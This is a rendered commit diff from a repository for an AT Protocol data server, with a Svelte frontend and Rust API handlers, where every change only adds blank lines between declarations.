this repo has no description

Add back some whitespaces

lewis 7e0d55c4 6f959c6c

Changed files
+1841 -10
frontend
src
tests
+11
frontend/src/App.svelte
··· 9 import Settings from './routes/Settings.svelte' 10 import Notifications from './routes/Notifications.svelte' 11 import RepoExplorer from './routes/RepoExplorer.svelte' 12 const auth = getAuthState() 13 $effect(() => { 14 initAuth() 15 }) 16 function getComponent(path: string) { 17 switch (path) { 18 case '/login': ··· 35 return auth.session ? Dashboard : Login 36 } 37 } 38 let currentPath = $derived(getCurrentPath()) 39 let CurrentComponent = $derived(getComponent(currentPath)) 40 </script> 41 <main> 42 {#if auth.loading} 43 <div class="loading"> ··· 47 <CurrentComponent /> 48 {/if} 49 </main> 50 <style> 51 :global(:root) { 52 --bg-primary: #fafafa; ··· 70 --warning-bg: #ffd; 71 --warning-text: #660; 72 } 73 @media (prefers-color-scheme: dark) { 74 :global(:root) { 75 --bg-primary: #1a1a1a; ··· 94 --warning-text: #c6c67b; 95 } 96 } 97 :global(body) { 98 margin: 0; 99 font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; ··· 101 color: var(--text-primary); 102 background: var(--bg-primary); 103 } 104 :global(*) { 105 box-sizing: border-box; 106 } 107 main { 108 min-height: 100vh; 109 background: var(--bg-primary); 110 } 111 .loading { 112 display: flex; 113 align-items: center;
··· 9 import Settings from './routes/Settings.svelte' 10 import Notifications from './routes/Notifications.svelte' 11 import RepoExplorer from './routes/RepoExplorer.svelte' 12 + 13 const auth = getAuthState() 14 + 15 $effect(() => { 16 initAuth() 17 }) 18 + 19 function getComponent(path: string) { 20 switch (path) { 21 case '/login': ··· 38 return auth.session ? Dashboard : Login 39 } 40 } 41 + 42 let currentPath = $derived(getCurrentPath()) 43 let CurrentComponent = $derived(getComponent(currentPath)) 44 </script> 45 + 46 <main> 47 {#if auth.loading} 48 <div class="loading"> ··· 52 <CurrentComponent /> 53 {/if} 54 </main> 55 + 56 <style> 57 :global(:root) { 58 --bg-primary: #fafafa; ··· 76 --warning-bg: #ffd; 77 --warning-text: #660; 78 } 79 + 80 @media (prefers-color-scheme: dark) { 81 :global(:root) { 82 --bg-primary: #1a1a1a; ··· 101 --warning-text: #c6c67b; 102 } 103 } 104 + 105 :global(body) { 106 margin: 0; 107 font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; ··· 109 color: var(--text-primary); 110 background: var(--bg-primary); 111 } 112 + 113 :global(*) { 114 box-sizing: border-box; 115 } 116 + 117 main { 118 min-height: 100vh; 119 background: var(--bg-primary); 120 } 121 + 122 .loading { 123 display: flex; 124 align-items: center;
+37
frontend/src/lib/api.ts
··· 1 const API_BASE = '/xrpc' 2 export class ApiError extends Error { 3 public did?: string 4 constructor(public status: number, public error: string, message: string, did?: string) { ··· 7 this.did = did 8 } 9 } 10 async function xrpc<T>(method: string, options?: { 11 method?: 'GET' | 'POST' 12 params?: Record<string, string> ··· 37 } 38 return res.json() 39 } 40 export interface Session { 41 did: string 42 handle: string ··· 47 accessJwt: string 48 refreshJwt: string 49 } 50 export interface AppPassword { 51 name: string 52 createdAt: string 53 } 54 export interface InviteCode { 55 code: string 56 available: number ··· 60 createdAt: string 61 uses: { usedBy: string; usedAt: string }[] 62 } 63 export type VerificationChannel = 'email' | 'discord' | 'telegram' | 'signal' 64 export interface CreateAccountParams { 65 handle: string 66 email: string ··· 71 telegramUsername?: string 72 signalNumber?: string 73 } 74 export interface CreateAccountResult { 75 handle: string 76 did: string 77 verificationRequired: boolean 78 verificationChannel: string 79 } 80 export interface ConfirmSignupResult { 81 accessJwt: string 82 refreshJwt: string ··· 87 preferredChannel?: string 88 preferredChannelVerified?: boolean 89 } 90 export const api = { 91 async createAccount(params: CreateAccountParams): Promise<CreateAccountResult> { 92 return xrpc('com.atproto.server.createAccount', { ··· 103 }, 104 }) 105 }, 106 async confirmSignup(did: string, verificationCode: string): Promise<ConfirmSignupResult> { 107 return xrpc('com.atproto.server.confirmSignup', { 108 method: 'POST', 109 body: { did, verificationCode }, 110 }) 111 }, 112 async resendVerification(did: string): Promise<{ success: boolean }> { 113 return xrpc('com.atproto.server.resendVerification', { 114 method: 'POST', 115 body: { did }, 116 }) 117 }, 118 async createSession(identifier: string, password: string): Promise<Session> { 119 return xrpc('com.atproto.server.createSession', { 120 method: 'POST', 121 body: { identifier, password }, 122 }) 123 }, 124 async getSession(token: string): Promise<Session> { 125 return xrpc('com.atproto.server.getSession', { token }) 126 }, 127 async refreshSession(refreshJwt: string): Promise<Session> { 128 return xrpc('com.atproto.server.refreshSession', { 129 method: 'POST', 130 token: refreshJwt, 131 }) 132 }, 133 async deleteSession(token: string): Promise<void> { 134 await xrpc('com.atproto.server.deleteSession', { 135 method: 'POST', 136 token, 137 }) 138 }, 139 async listAppPasswords(token: string): Promise<{ passwords: AppPassword[] }> { 140 return xrpc('com.atproto.server.listAppPasswords', { token }) 141 }, 142 async createAppPassword(token: string, name: string): Promise<{ name: string; password: string; createdAt: string }> { 143 return xrpc('com.atproto.server.createAppPassword', { 144 method: 'POST', ··· 146 body: { name }, 147 }) 148 }, 149 async revokeAppPassword(token: string, name: string): Promise<void> { 150 await xrpc('com.atproto.server.revokeAppPassword', { 151 method: 'POST', ··· 153 body: { name }, 154 }) 155 }, 156 async getAccountInviteCodes(token: string): Promise<{ codes: InviteCode[] }> { 157 return xrpc('com.atproto.server.getAccountInviteCodes', { token }) 158 }, 159 async createInviteCode(token: string, useCount: number = 1): Promise<{ code: string }> { 160 return xrpc('com.atproto.server.createInviteCode', { 161 method: 'POST', ··· 163 body: { useCount }, 164 }) 165 }, 166 async requestPasswordReset(email: string): Promise<void> { 167 await xrpc('com.atproto.server.requestPasswordReset', { 168 method: 'POST', 169 body: { email }, 170 }) 171 }, 172 async resetPassword(token: string, password: string): Promise<void> { 173 await xrpc('com.atproto.server.resetPassword', { 174 method: 'POST', 175 body: { token, password }, 176 }) 177 }, 178 async requestEmailUpdate(token: string): Promise<{ tokenRequired: boolean }> { 179 return xrpc('com.atproto.server.requestEmailUpdate', { 180 method: 'POST', 181 token, 182 }) 183 }, 184 async updateEmail(token: string, email: string, emailToken?: string): Promise<void> { 185 await xrpc('com.atproto.server.updateEmail', { 186 method: 'POST', ··· 188 body: { email, token: emailToken }, 189 }) 190 }, 191 async updateHandle(token: string, handle: string): Promise<void> { 192 await xrpc('com.atproto.identity.updateHandle', { 193 method: 'POST', ··· 195 body: { handle }, 196 }) 197 }, 198 async requestAccountDelete(token: string): Promise<void> { 199 await xrpc('com.atproto.server.requestAccountDelete', { 200 method: 'POST', 201 token, 202 }) 203 }, 204 async deleteAccount(did: string, password: string, deleteToken: string): Promise<void> { 205 await xrpc('com.atproto.server.deleteAccount', { 206 method: 'POST', 207 body: { did, password, token: deleteToken }, 208 }) 209 }, 210 async describeServer(): Promise<{ 211 availableUserDomains: string[] 212 inviteCodeRequired: boolean ··· 214 }> { 215 return xrpc('com.atproto.server.describeServer') 216 }, 217 async getNotificationPrefs(token: string): Promise<{ 218 preferredChannel: string 219 email: string ··· 226 }> { 227 return xrpc('com.bspds.account.getNotificationPrefs', { token }) 228 }, 229 async updateNotificationPrefs(token: string, prefs: { 230 preferredChannel?: string 231 discordId?: string ··· 238 body: prefs, 239 }) 240 }, 241 async describeRepo(token: string, repo: string): Promise<{ 242 handle: string 243 did: string ··· 250 params: { repo }, 251 }) 252 }, 253 async listRecords(token: string, repo: string, collection: string, options?: { 254 limit?: number 255 cursor?: string ··· 264 if (options?.reverse) params.reverse = 'true' 265 return xrpc('com.atproto.repo.listRecords', { token, params }) 266 }, 267 async getRecord(token: string, repo: string, collection: string, rkey: string): Promise<{ 268 uri: string 269 cid: string ··· 274 params: { repo, collection, rkey }, 275 }) 276 }, 277 async createRecord(token: string, repo: string, collection: string, record: unknown, rkey?: string): Promise<{ 278 uri: string 279 cid: string ··· 284 body: { repo, collection, record, rkey }, 285 }) 286 }, 287 async putRecord(token: string, repo: string, collection: string, rkey: string, record: unknown): Promise<{ 288 uri: string 289 cid: string ··· 294 body: { repo, collection, rkey, record }, 295 }) 296 }, 297 async deleteRecord(token: string, repo: string, collection: string, rkey: string): Promise<void> { 298 await xrpc('com.atproto.repo.deleteRecord', { 299 method: 'POST',
··· 1 const API_BASE = '/xrpc' 2 + 3 export class ApiError extends Error { 4 public did?: string 5 constructor(public status: number, public error: string, message: string, did?: string) { ··· 8 this.did = did 9 } 10 } 11 + 12 async function xrpc<T>(method: string, options?: { 13 method?: 'GET' | 'POST' 14 params?: Record<string, string> ··· 39 } 40 return res.json() 41 } 42 + 43 export interface Session { 44 did: string 45 handle: string ··· 50 accessJwt: string 51 refreshJwt: string 52 } 53 + 54 export interface AppPassword { 55 name: string 56 createdAt: string 57 } 58 + 59 export interface InviteCode { 60 code: string 61 available: number ··· 65 createdAt: string 66 uses: { usedBy: string; usedAt: string }[] 67 } 68 + 69 export type VerificationChannel = 'email' | 'discord' | 'telegram' | 'signal' 70 + 71 export interface CreateAccountParams { 72 handle: string 73 email: string ··· 78 telegramUsername?: string 79 signalNumber?: string 80 } 81 + 82 export interface CreateAccountResult { 83 handle: string 84 did: string 85 verificationRequired: boolean 86 verificationChannel: string 87 } 88 + 89 export interface ConfirmSignupResult { 90 accessJwt: string 91 refreshJwt: string ··· 96 preferredChannel?: string 97 preferredChannelVerified?: boolean 98 } 99 + 100 export const api = { 101 async createAccount(params: CreateAccountParams): Promise<CreateAccountResult> { 102 return xrpc('com.atproto.server.createAccount', { ··· 113 }, 114 }) 115 }, 116 + 117 async confirmSignup(did: string, verificationCode: string): Promise<ConfirmSignupResult> { 118 return xrpc('com.atproto.server.confirmSignup', { 119 method: 'POST', 120 body: { did, verificationCode }, 121 }) 122 }, 123 + 124 async resendVerification(did: string): Promise<{ success: boolean }> { 125 return xrpc('com.atproto.server.resendVerification', { 126 method: 'POST', 127 body: { did }, 128 }) 129 }, 130 + 131 async createSession(identifier: string, password: string): Promise<Session> { 132 return xrpc('com.atproto.server.createSession', { 133 method: 'POST', 134 body: { identifier, password }, 135 }) 136 }, 137 + 138 async getSession(token: string): Promise<Session> { 139 return xrpc('com.atproto.server.getSession', { token }) 140 }, 141 + 142 async refreshSession(refreshJwt: string): Promise<Session> { 143 return xrpc('com.atproto.server.refreshSession', { 144 method: 'POST', 145 token: refreshJwt, 146 }) 147 }, 148 + 149 async deleteSession(token: string): Promise<void> { 150 await xrpc('com.atproto.server.deleteSession', { 151 method: 'POST', 152 token, 153 }) 154 }, 155 + 156 async listAppPasswords(token: string): Promise<{ passwords: AppPassword[] }> { 157 return xrpc('com.atproto.server.listAppPasswords', { token }) 158 }, 159 + 160 async createAppPassword(token: string, name: string): Promise<{ name: string; password: string; createdAt: string }> { 161 return xrpc('com.atproto.server.createAppPassword', { 162 method: 'POST', ··· 164 body: { name }, 165 }) 166 }, 167 + 168 async revokeAppPassword(token: string, name: string): Promise<void> { 169 await xrpc('com.atproto.server.revokeAppPassword', { 170 method: 'POST', ··· 172 body: { name }, 173 }) 174 }, 175 + 176 async getAccountInviteCodes(token: string): Promise<{ codes: InviteCode[] }> { 177 return xrpc('com.atproto.server.getAccountInviteCodes', { token }) 178 }, 179 + 180 async createInviteCode(token: string, useCount: number = 1): Promise<{ code: string }> { 181 return xrpc('com.atproto.server.createInviteCode', { 182 method: 'POST', ··· 184 body: { useCount }, 185 }) 186 }, 187 + 188 async requestPasswordReset(email: string): Promise<void> { 189 await xrpc('com.atproto.server.requestPasswordReset', { 190 method: 'POST', 191 body: { email }, 192 }) 193 }, 194 + 195 async resetPassword(token: string, password: string): Promise<void> { 196 await xrpc('com.atproto.server.resetPassword', { 197 method: 'POST', 198 body: { token, password }, 199 }) 200 }, 201 + 202 async requestEmailUpdate(token: string): Promise<{ tokenRequired: boolean }> { 203 return xrpc('com.atproto.server.requestEmailUpdate', { 204 method: 'POST', 205 token, 206 }) 207 }, 208 + 209 async updateEmail(token: string, email: string, emailToken?: string): Promise<void> { 210 await xrpc('com.atproto.server.updateEmail', { 211 method: 'POST', ··· 213 body: { email, token: emailToken }, 214 }) 215 }, 216 + 217 async updateHandle(token: string, handle: string): Promise<void> { 218 await xrpc('com.atproto.identity.updateHandle', { 219 method: 'POST', ··· 221 body: { handle }, 222 }) 223 }, 224 + 225 async requestAccountDelete(token: string): Promise<void> { 226 await xrpc('com.atproto.server.requestAccountDelete', { 227 method: 'POST', 228 token, 229 }) 230 }, 231 + 232 async deleteAccount(did: string, password: string, deleteToken: string): Promise<void> { 233 await xrpc('com.atproto.server.deleteAccount', { 234 method: 'POST', 235 body: { did, password, token: deleteToken }, 236 }) 237 }, 238 + 239 async describeServer(): Promise<{ 240 availableUserDomains: string[] 241 inviteCodeRequired: boolean ··· 243 }> { 244 return xrpc('com.atproto.server.describeServer') 245 }, 246 + 247 async getNotificationPrefs(token: string): Promise<{ 248 preferredChannel: string 249 email: string ··· 256 }> { 257 return xrpc('com.bspds.account.getNotificationPrefs', { token }) 258 }, 259 + 260 async updateNotificationPrefs(token: string, prefs: { 261 preferredChannel?: string 262 discordId?: string ··· 269 body: prefs, 270 }) 271 }, 272 + 273 async describeRepo(token: string, repo: string): Promise<{ 274 handle: string 275 did: string ··· 282 params: { repo }, 283 }) 284 }, 285 + 286 async listRecords(token: string, repo: string, collection: string, options?: { 287 limit?: number 288 cursor?: string ··· 297 if (options?.reverse) params.reverse = 'true' 298 return xrpc('com.atproto.repo.listRecords', { token, params }) 299 }, 300 + 301 async getRecord(token: string, repo: string, collection: string, rkey: string): Promise<{ 302 uri: string 303 cid: string ··· 308 params: { repo, collection, rkey }, 309 }) 310 }, 311 + 312 async createRecord(token: string, repo: string, collection: string, record: unknown, rkey?: string): Promise<{ 313 uri: string 314 cid: string ··· 319 body: { repo, collection, record, rkey }, 320 }) 321 }, 322 + 323 async putRecord(token: string, repo: string, collection: string, rkey: string, record: unknown): Promise<{ 324 uri: string 325 cid: string ··· 330 body: { repo, collection, rkey, record }, 331 }) 332 }, 333 + 334 async deleteRecord(token: string, repo: string, collection: string, rkey: string): Promise<void> { 335 await xrpc('com.atproto.repo.deleteRecord', { 336 method: 'POST',
+16
frontend/src/lib/auth.svelte.ts
··· 1 import { api, type Session, type CreateAccountParams, type CreateAccountResult, ApiError } from './api' 2 const STORAGE_KEY = 'bspds_session' 3 interface AuthState { 4 session: Session | null 5 loading: boolean 6 error: string | null 7 } 8 let state = $state<AuthState>({ 9 session: null, 10 loading: true, 11 error: null, 12 }) 13 function saveSession(session: Session | null) { 14 if (session) { 15 localStorage.setItem(STORAGE_KEY, JSON.stringify(session)) ··· 17 localStorage.removeItem(STORAGE_KEY) 18 } 19 } 20 function loadSession(): Session | null { 21 const stored = localStorage.getItem(STORAGE_KEY) 22 if (stored) { ··· 28 } 29 return null 30 } 31 export async function initAuth() { 32 state.loading = true 33 state.error = null ··· 54 } 55 state.loading = false 56 } 57 export async function login(identifier: string, password: string): Promise<void> { 58 state.loading = true 59 state.error = null ··· 72 state.loading = false 73 } 74 } 75 export async function register(params: CreateAccountParams): Promise<CreateAccountResult> { 76 try { 77 const result = await api.createAccount(params) ··· 85 throw e 86 } 87 } 88 export async function confirmSignup(did: string, verificationCode: string): Promise<void> { 89 state.loading = true 90 state.error = null ··· 113 state.loading = false 114 } 115 } 116 export async function resendVerification(did: string): Promise<void> { 117 try { 118 await api.resendVerification(did) ··· 123 throw new Error('Failed to resend verification code') 124 } 125 } 126 export async function logout(): Promise<void> { 127 if (state.session) { 128 try { ··· 134 state.session = null 135 saveSession(null) 136 } 137 export function getAuthState() { 138 return state 139 } 140 export function getToken(): string | null { 141 return state.session?.accessJwt ?? null 142 } 143 export function isAuthenticated(): boolean { 144 return state.session !== null 145 } 146 export function _testSetState(newState: { session: Session | null; loading: boolean; error: string | null }) { 147 state.session = newState.session 148 state.loading = newState.loading 149 state.error = newState.error 150 } 151 export function _testReset() { 152 state.session = null 153 state.loading = true
··· 1 import { api, type Session, type CreateAccountParams, type CreateAccountResult, ApiError } from './api' 2 + 3 const STORAGE_KEY = 'bspds_session' 4 + 5 interface AuthState { 6 session: Session | null 7 loading: boolean 8 error: string | null 9 } 10 + 11 let state = $state<AuthState>({ 12 session: null, 13 loading: true, 14 error: null, 15 }) 16 + 17 function saveSession(session: Session | null) { 18 if (session) { 19 localStorage.setItem(STORAGE_KEY, JSON.stringify(session)) ··· 21 localStorage.removeItem(STORAGE_KEY) 22 } 23 } 24 + 25 function loadSession(): Session | null { 26 const stored = localStorage.getItem(STORAGE_KEY) 27 if (stored) { ··· 33 } 34 return null 35 } 36 + 37 export async function initAuth() { 38 state.loading = true 39 state.error = null ··· 60 } 61 state.loading = false 62 } 63 + 64 export async function login(identifier: string, password: string): Promise<void> { 65 state.loading = true 66 state.error = null ··· 79 state.loading = false 80 } 81 } 82 + 83 export async function register(params: CreateAccountParams): Promise<CreateAccountResult> { 84 try { 85 const result = await api.createAccount(params) ··· 93 throw e 94 } 95 } 96 + 97 export async function confirmSignup(did: string, verificationCode: string): Promise<void> { 98 state.loading = true 99 state.error = null ··· 122 state.loading = false 123 } 124 } 125 + 126 export async function resendVerification(did: string): Promise<void> { 127 try { 128 await api.resendVerification(did) ··· 133 throw new Error('Failed to resend verification code') 134 } 135 } 136 + 137 export async function logout(): Promise<void> { 138 if (state.session) { 139 try { ··· 145 state.session = null 146 saveSession(null) 147 } 148 + 149 export function getAuthState() { 150 return state 151 } 152 + 153 export function getToken(): string | null { 154 return state.session?.accessJwt ?? null 155 } 156 + 157 export function isAuthenticated(): boolean { 158 return state.session !== null 159 } 160 + 161 export function _testSetState(newState: { session: Session | null; loading: boolean; error: string | null }) { 162 state.session = newState.session 163 state.loading = newState.loading 164 state.error = newState.error 165 } 166 + 167 export function _testReset() { 168 state.session = null 169 state.loading = true
+3
frontend/src/lib/router.svelte.ts
··· 1 let currentPath = $state(window.location.hash.slice(1) || '/') 2 window.addEventListener('hashchange', () => { 3 currentPath = window.location.hash.slice(1) || '/' 4 }) 5 export function navigate(path: string) { 6 window.location.hash = path 7 } 8 export function getCurrentPath() { 9 return currentPath 10 }
··· 1 let currentPath = $state(window.location.hash.slice(1) || '/') 2 + 3 window.addEventListener('hashchange', () => { 4 currentPath = window.location.hash.slice(1) || '/' 5 }) 6 + 7 export function navigate(path: string) { 8 window.location.hash = path 9 } 10 + 11 export function getCurrentPath() { 12 return currentPath 13 }
+2
frontend/src/main.ts
··· 1 import App from './App.svelte' 2 import { mount } from 'svelte' 3 const app = mount(App, { 4 target: document.getElementById('app')!, 5 }) 6 export default app
··· 1 import App from './App.svelte' 2 import { mount } from 'svelte' 3 + 4 const app = mount(App, { 5 target: document.getElementById('app')!, 6 }) 7 + 8 export default app
+4
frontend/src/tests/setup.ts
··· 1 import '@testing-library/jest-dom/vitest' 2 import { vi, beforeEach, afterEach } from 'vitest' 3 import { _testReset } from '../lib/auth.svelte' 4 let locationHash = '' 5 Object.defineProperty(window, 'location', { 6 value: { 7 get hash() { return locationHash }, ··· 19 writable: true, 20 configurable: true, 21 }) 22 beforeEach(() => { 23 vi.clearAllMocks() 24 localStorage.clear() ··· 26 locationHash = '' 27 _testReset() 28 }) 29 afterEach(() => { 30 vi.restoreAllMocks() 31 })
··· 1 import '@testing-library/jest-dom/vitest' 2 import { vi, beforeEach, afterEach } from 'vitest' 3 import { _testReset } from '../lib/auth.svelte' 4 + 5 let locationHash = '' 6 + 7 Object.defineProperty(window, 'location', { 8 value: { 9 get hash() { return locationHash }, ··· 21 writable: true, 22 configurable: true, 23 }) 24 + 25 beforeEach(() => { 26 vi.clearAllMocks() 27 localStorage.clear() ··· 29 locationHash = '' 30 _testReset() 31 }) 32 + 33 afterEach(() => { 34 vi.restoreAllMocks() 35 })
+7
frontend/src/tests/utils.ts
··· 1 import { render, type RenderResult } from '@testing-library/svelte' 2 import { tick } from 'svelte' 3 import type { ComponentType } from 'svelte' 4 export async function renderAndWait<T extends ComponentType>( 5 component: T, 6 options?: Parameters<typeof render>[1] ··· 10 await new Promise(resolve => setTimeout(resolve, 0)) 11 return result 12 } 13 export async function waitForElement( 14 queryFn: () => HTMLElement | null, 15 timeout = 1000 ··· 22 } 23 throw new Error('Element not found within timeout') 24 } 25 export async function waitForElementToDisappear( 26 queryFn: () => HTMLElement | null, 27 timeout = 1000 ··· 34 } 35 throw new Error('Element still present after timeout') 36 } 37 export async function waitForText( 38 container: HTMLElement, 39 text: string | RegExp, ··· 49 } 50 throw new Error(`Text "${text}" not found within timeout`) 51 } 52 export function mockLocalStorage(initialData: Record<string, string> = {}): void { 53 const store: Record<string, string> = { ...initialData } 54 Object.defineProperty(window, 'localStorage', { ··· 63 writable: true, 64 }) 65 } 66 export function setAuthState(session: { 67 did: string 68 handle: string ··· 73 }): void { 74 localStorage.setItem('session', JSON.stringify(session)) 75 } 76 export function clearAuthState(): void { 77 localStorage.removeItem('session') 78 }
··· 1 import { render, type RenderResult } from '@testing-library/svelte' 2 import { tick } from 'svelte' 3 import type { ComponentType } from 'svelte' 4 + 5 export async function renderAndWait<T extends ComponentType>( 6 component: T, 7 options?: Parameters<typeof render>[1] ··· 11 await new Promise(resolve => setTimeout(resolve, 0)) 12 return result 13 } 14 + 15 export async function waitForElement( 16 queryFn: () => HTMLElement | null, 17 timeout = 1000 ··· 24 } 25 throw new Error('Element not found within timeout') 26 } 27 + 28 export async function waitForElementToDisappear( 29 queryFn: () => HTMLElement | null, 30 timeout = 1000 ··· 37 } 38 throw new Error('Element still present after timeout') 39 } 40 + 41 export async function waitForText( 42 container: HTMLElement, 43 text: string | RegExp, ··· 53 } 54 throw new Error(`Text "${text}" not found within timeout`) 55 } 56 + 57 export function mockLocalStorage(initialData: Record<string, string> = {}): void { 58 const store: Record<string, string> = { ...initialData } 59 Object.defineProperty(window, 'localStorage', { ··· 68 writable: true, 69 }) 70 } 71 + 72 export function setAuthState(session: { 73 did: string 74 handle: string ··· 79 }): void { 80 localStorage.setItem('session', JSON.stringify(session)) 81 } 82 + 83 export function clearAuthState(): void { 84 localStorage.removeItem('session') 85 }
+1
src/api/actor/mod.rs
··· 1 mod preferences; 2 mod profile; 3 pub use preferences::{get_preferences, put_preferences}; 4 pub use profile::{get_profile, get_profiles};
··· 1 mod preferences; 2 mod profile; 3 + 4 pub use preferences::{get_preferences, put_preferences}; 5 pub use profile::{get_profile, get_profiles};
+3
src/api/actor/preferences.rs
··· 7 }; 8 use serde::{Deserialize, Serialize}; 9 use serde_json::{json, Value}; 10 const APP_BSKY_NAMESPACE: &str = "app.bsky"; 11 const MAX_PREFERENCES_COUNT: usize = 100; 12 const MAX_PREFERENCE_SIZE: usize = 10_000; 13 #[derive(Serialize)] 14 pub struct GetPreferencesOutput { 15 pub preferences: Vec<Value>, ··· 84 .collect(); 85 (StatusCode::OK, Json(GetPreferencesOutput { preferences })).into_response() 86 } 87 #[derive(Deserialize)] 88 pub struct PutPreferencesInput { 89 pub preferences: Vec<Value>,
··· 7 }; 8 use serde::{Deserialize, Serialize}; 9 use serde_json::{json, Value}; 10 + 11 const APP_BSKY_NAMESPACE: &str = "app.bsky"; 12 const MAX_PREFERENCES_COUNT: usize = 100; 13 const MAX_PREFERENCE_SIZE: usize = 10_000; 14 + 15 #[derive(Serialize)] 16 pub struct GetPreferencesOutput { 17 pub preferences: Vec<Value>, ··· 86 .collect(); 87 (StatusCode::OK, Json(GetPreferencesOutput { preferences })).into_response() 88 } 89 + 90 #[derive(Deserialize)] 91 pub struct PutPreferencesInput { 92 pub preferences: Vec<Value>,
+9
src/api/actor/profile.rs
··· 11 use serde_json::{json, Value}; 12 use std::collections::HashMap; 13 use tracing::{error, info}; 14 #[derive(Deserialize)] 15 pub struct GetProfileParams { 16 pub actor: String, 17 } 18 #[derive(Deserialize)] 19 pub struct GetProfilesParams { 20 pub actors: String, 21 } 22 #[derive(Serialize, Deserialize, Clone)] 23 #[serde(rename_all = "camelCase")] 24 pub struct ProfileViewDetailed { ··· 35 #[serde(flatten)] 36 pub extra: HashMap<String, Value>, 37 } 38 #[derive(Serialize, Deserialize)] 39 pub struct GetProfilesOutput { 40 pub profiles: Vec<ProfileViewDetailed>, 41 } 42 async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> { 43 let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 44 .fetch_optional(&state.db) ··· 55 let block_bytes = state.block_store.get(&cid).await.ok()??; 56 serde_ipld_dagcbor::from_slice(&block_bytes).ok() 57 } 58 fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) { 59 if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) { 60 profile.display_name = Some(display_name.to_string()); ··· 63 profile.description = Some(description.to_string()); 64 } 65 } 66 async fn proxy_to_appview( 67 method: &str, 68 params: &HashMap<String, String>, ··· 104 } 105 } 106 } 107 pub async fn get_profile( 108 State(state): State<AppState>, 109 headers: axum::http::HeaderMap, ··· 146 } 147 (StatusCode::OK, Json(profile)).into_response() 148 } 149 pub async fn get_profiles( 150 State(state): State<AppState>, 151 headers: axum::http::HeaderMap,
··· 11 use serde_json::{json, Value}; 12 use std::collections::HashMap; 13 use tracing::{error, info}; 14 + 15 #[derive(Deserialize)] 16 pub struct GetProfileParams { 17 pub actor: String, 18 } 19 + 20 #[derive(Deserialize)] 21 pub struct GetProfilesParams { 22 pub actors: String, 23 } 24 + 25 #[derive(Serialize, Deserialize, Clone)] 26 #[serde(rename_all = "camelCase")] 27 pub struct ProfileViewDetailed { ··· 38 #[serde(flatten)] 39 pub extra: HashMap<String, Value>, 40 } 41 + 42 #[derive(Serialize, Deserialize)] 43 pub struct GetProfilesOutput { 44 pub profiles: Vec<ProfileViewDetailed>, 45 } 46 + 47 async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> { 48 let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 49 .fetch_optional(&state.db) ··· 60 let block_bytes = state.block_store.get(&cid).await.ok()??; 61 serde_ipld_dagcbor::from_slice(&block_bytes).ok() 62 } 63 + 64 fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) { 65 if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) { 66 profile.display_name = Some(display_name.to_string()); ··· 69 profile.description = Some(description.to_string()); 70 } 71 } 72 + 73 async fn proxy_to_appview( 74 method: &str, 75 params: &HashMap<String, String>, ··· 111 } 112 } 113 } 114 + 115 pub async fn get_profile( 116 State(state): State<AppState>, 117 headers: axum::http::HeaderMap, ··· 154 } 155 (StatusCode::OK, Json(profile)).into_response() 156 } 157 + 158 pub async fn get_profiles( 159 State(state): State<AppState>, 160 headers: axum::http::HeaderMap,
+2
src/api/admin/account/delete.rs
··· 8 use serde::Deserialize; 9 use serde_json::json; 10 use tracing::{error, warn}; 11 #[derive(Deserialize)] 12 pub struct DeleteAccountInput { 13 pub did: String, 14 } 15 pub async fn delete_account( 16 State(state): State<AppState>, 17 headers: axum::http::HeaderMap,
··· 8 use serde::Deserialize; 9 use serde_json::json; 10 use tracing::{error, warn}; 11 + 12 #[derive(Deserialize)] 13 pub struct DeleteAccountInput { 14 pub did: String, 15 } 16 + 17 pub async fn delete_account( 18 State(state): State<AppState>, 19 headers: axum::http::HeaderMap,
+3
src/api/admin/account/email.rs
··· 8 use serde::{Deserialize, Serialize}; 9 use serde_json::json; 10 use tracing::{error, warn}; 11 #[derive(Deserialize)] 12 #[serde(rename_all = "camelCase")] 13 pub struct SendEmailInput { ··· 17 pub subject: Option<String>, 18 pub comment: Option<String>, 19 } 20 #[derive(Serialize)] 21 pub struct SendEmailOutput { 22 pub sent: bool, 23 } 24 pub async fn send_email( 25 State(state): State<AppState>, 26 headers: axum::http::HeaderMap,
··· 8 use serde::{Deserialize, Serialize}; 9 use serde_json::json; 10 use tracing::{error, warn}; 11 + 12 #[derive(Deserialize)] 13 #[serde(rename_all = "camelCase")] 14 pub struct SendEmailInput { ··· 18 pub subject: Option<String>, 19 pub comment: Option<String>, 20 } 21 + 22 #[derive(Serialize)] 23 pub struct SendEmailOutput { 24 pub sent: bool, 25 } 26 + 27 pub async fn send_email( 28 State(state): State<AppState>, 29 headers: axum::http::HeaderMap,
+6
src/api/admin/account/info.rs
··· 8 use serde::{Deserialize, Serialize}; 9 use serde_json::json; 10 use tracing::error; 11 #[derive(Deserialize)] 12 pub struct GetAccountInfoParams { 13 pub did: String, 14 } 15 #[derive(Serialize)] 16 #[serde(rename_all = "camelCase")] 17 pub struct AccountInfo { ··· 24 pub email_confirmed_at: Option<String>, 25 pub deactivated_at: Option<String>, 26 } 27 #[derive(Serialize)] 28 #[serde(rename_all = "camelCase")] 29 pub struct GetAccountInfosOutput { 30 pub infos: Vec<AccountInfo>, 31 } 32 pub async fn get_account_info( 33 State(state): State<AppState>, 34 headers: axum::http::HeaderMap, ··· 92 } 93 } 94 } 95 #[derive(Deserialize)] 96 pub struct GetAccountInfosParams { 97 pub dids: String, 98 } 99 pub async fn get_account_infos( 100 State(state): State<AppState>, 101 headers: axum::http::HeaderMap,
